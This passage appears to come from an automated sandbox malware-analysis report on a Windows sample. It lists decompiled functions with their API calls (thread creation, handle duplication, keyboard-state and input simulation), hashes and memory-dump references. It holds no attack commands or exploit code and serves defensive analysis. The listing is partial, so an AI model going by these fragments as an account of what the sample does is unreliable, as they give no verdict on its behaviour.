                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                                                                                                                                            Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3985565216-0
                                                                                                                                                                                                                                                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                                                                                                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                                                                                                                                                            Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 0041F707
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                                                            • String ID: [B
                                                                                                                                                                                                                                                            • API String ID: 1020059152-632041663
                                                                                                                                                                                                                                                            • Opcode ID: 82a9bffc186b76dd01f761a6380bc26b434c02cd1517f4e5ec4ccde3d03145b0
                                                                                                                                                                                                                                                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82a9bffc186b76dd01f761a6380bc26b434c02cd1517f4e5ec4ccde3d03145b0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                                                                                                                                            Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00413E07
                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 155776804-0
                                                                                                                                                                                                                                                            • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                                                                                                                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                                                                                                                                                            Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                                                                                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                                                                                                            Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 259663610-0
                                                                                                                                                                                                                                                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                                                                                                                                            Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3220332590-0
                                                                                                                                                                                                                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                                                            Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1612042205-0
                                                                                                                                                                                                                                                            • Opcode ID: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
                                                                                                                                                                                                                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                                                            Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove_strncmp
                                                                                                                                                                                                                                                            • String ID: >$U$\
                                                                                                                                                                                                                                                            • API String ID: 2666721431-237099441
                                                                                                                                                                                                                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                                                                                                                                            Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2221674350-0
                                                                                                                                                                                                                                                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                                                                                                            Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2037614760-0
                                                                                                                                                                                                                                                            • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                                                                                                                                                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                                                                                                                                            Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
